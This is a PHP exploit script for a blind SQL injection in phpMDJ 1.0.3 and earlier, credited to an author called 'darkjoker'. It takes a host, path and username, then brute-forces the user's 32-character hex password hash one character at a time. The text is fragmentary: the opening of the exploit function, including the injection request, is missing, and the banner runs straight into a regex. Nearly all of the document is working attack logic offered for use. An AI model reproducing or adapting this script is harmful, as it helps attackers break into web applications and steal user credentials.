--+++=========================================================+++-- --+++====== phpMDJ <= 1.0.3 Blind SQL Injection Exploit ======+++-- --+++=========================================================+++-- :(.+)<\/h2>/", $reply, $x); if (strlen (trim ($x [1])) == 0) return false; else return true; } function usage () { echo "\n[+] phpMDJ <= 1.0.3 Blind SQL Injection Exploit". "\n[+] Author: darkjoker". "\n[+] Site : http://darkjoker.net23.net". "\n[+] Usage : php xpl.php ". "\n[+] Ex. : php xpl.php localhost /phpMDJ admin". "\n\n"; exit (); } if ($argc != 4) usage (); $hostname = $argv [1]; $path = $argv [2]; $user = $argv [3]; $key = "abcdef0123456789"; $pos = 1; $chr = 0; echo "[+] Password: "; while ($pos <= 32) { if (exploit ($hostname, $path, $user, $key [$chr], $pos)) { echo $key [$chr]; $chr = -1; $pos++; } $chr++; } echo "\n\n";